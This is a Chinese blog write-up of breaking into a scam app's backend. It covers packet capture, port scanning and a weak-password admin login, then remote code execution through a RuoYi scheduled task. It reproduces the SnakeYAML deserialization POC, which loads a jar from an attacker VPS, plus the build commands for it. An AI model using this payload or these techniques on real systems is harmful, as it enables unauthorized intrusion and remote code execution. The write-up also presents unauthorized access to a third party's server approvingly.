服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

记一次招Piao的App漏洞挖掘再到RCE的过程

日期: 来源:黑白之道收集编辑:

前言每次看到这种信息,血气方刚的年纪哪里受得了这种诱惑,果断下载

我是helen黑客,一刀9999999,点击下载,跟我一起当黑客

下载之后紧接着是系统发的约x信息,和猫片

还得是你,这套系统打过很多套了,基本上拿不下,本来也不抱着希望,走的都是tcp,就赌他有没有其他项目系统

开始抓包

分析发送消息的tcp发包

数据包大小匹配

走的tcp协议

获取ip之后,扫下端口

发现只开了80,扫描接口的时候泄露铭感信息

http://212.x.x.x

这应该是一台接收服务器

端口扫描开启了22和8888

http://212.*.*.*:8888/login?redirect=%2Findex

猜了下账号

总结出两个账号

Supadmin是管理员账号123456应该是运营账号

尝试弱口令

123456-123456进去

不愧是诈骗份子,项目挺多

这一看就是诺依系统,由于对这系统不熟悉,交给大佬去弄,过了半小时, 他给发来一个秘钥

至于怎么拿的我也很好奇,他说没限制权限,可以越权到定时任务

http//*****/***/**到定时任务

下载

下载payload

https://github.com/artsploit/yaml-payload 

下载完成之后我们修改一下 AwesomeScriptEngineFactory.java这个文件的内容

改成我们要执行的命令,上面那一行可以删掉

然后编写*.yml没有的话自己创建下

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://artsploit.com/yaml-payload.jar"]]]]

然后把你要执行的java代码放到AwesomeScriptEngineFactory.java中编译:

javac src/artsploit/AwesomeScriptEngineFactory.javajar -cvf yaml-payload.jar -C src/ .

添加任务

添加任务添加POC:

POC:

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps-ip:port/yaml-payload.jar"]]]]') 

这里填写

0*/1 * * * * 自定义时间即可

原来都是管理员,只是阉割了页面。。。。

文章来源:HACK学习呀


黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

多一个点在看多一条小鱼干

相关阅读

  • 当代年轻人,自信且“疯”

  • 昨天上新了一档新综艺,《青年π计划》。一部年轻音乐人的竞演节目,但跟前两年流行的偶像选秀节目,画风完全不同。‍‍‍‍‍‍看看他们的装扮:千奇百怪,谁跟谁长得都不一样。打眼
  • 品读|太平猴魁:成名之路,都是脚步

  • *本文为《品读》2023年第4期内容太平的四周都是石头,又高又陡。麂子的嘶鸣,破不了围堵,流星划不完黑崖的规模。半途而废的火苗不是火苗,扯不平的山和飞云又在争着开头。方南山、
  • 陈佳勇:金农的水仙|新刊预览+创作谈

  • 点击上图查看新刊目录导读:当代都市的纷纷扰扰,那些因诱惑而隐瞒的真相,都被这幅疑似赝品的“金农的水仙”所牵出。“山青青,云冥冥,下有水蒲迷遥汀。飞来无迹,风标公子白如雪。”
  • 第一次奔现之前必读

  • 友友们好,我是乱老师~后台树洞收到一条留言:第一次见面的时候,他就扇我耳光,亲我,摸我xiong,还问我do吗?好吧,我小白,当时也不知道该怎么入圈,以为大家约出来见面就这么直接的嘛?我有点
  • 卡完脖子踹裤裆,也太看得起我了吧?

  • 大家好,昨天歇了一天,主要是被锤昏古去了。真的,我这辈子都没有想象过,自己有一天能享受这么高级别的“待遇”。不少人知道,我最近忙着搓GPT Plus的码子。咱是GPT推崇者不假,但我
  • 再获多项大奖!北邮人勇攀科创高峰!

  • 近日,由工业和信息化部人才交流中心主办的第六届全国大学生集成电路创新创业大赛决赛颁奖式在重庆举办。我校学子共获得全国企业大奖1项,一等奖2项,三等奖6项的优异成绩,北京邮

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四
  • 美国对华2000亿关税清单,到底影响有多大?

  • 1 今天A股大跌,上证最大跌幅超过2%。直接导火索是美国证实计划对华2000亿美元产品加征25%关税。 听起来,2000亿美元数目巨大,我们来算笔账。 2000亿美元,按现在人民币汇率

最新文章

  • 2023年全国网球团体锦标赛在日照开赛!

  • 4月28日上午,2023年全国网球团体锦标赛在日照·安泰网球中心开赛,比赛将持续到5月5日。孙发京、李喆、柏衍、高馨妤、王雅繁等多位国内排名前20的网坛名将将展开激烈角逐。国
  • 免费在线AI图片放大,是无限放大哦!

  • “设为星标”第一时间接收推送,精彩内容不容错过!前言在线免费的图片放大网站有不少,但绝大多数都只能放大2倍或4倍,想要再大的话就有限制了,今天要给大家推荐的这个网站可以将JP
  • 记一次招Piao的App漏洞挖掘再到RCE的过程

  • 前言每次看到这种信息,血气方刚的年纪哪里受得了这种诱惑,果断下载我是helen黑客,一刀9999999,点击下载,跟我一起当黑客下载之后紧接着是系统发的约x信息,和猫片还得是你,这套系统
  • Github开源工具–抓取浏览器密码

  • 这是一个抓取浏览器密码的工具,用于内网横向渗透相关登录凭证获取,后续会添加更多功能。地址https://github.com/QAX-A-Team/BrowserGhost当前已完成功能演示1. 实现system抓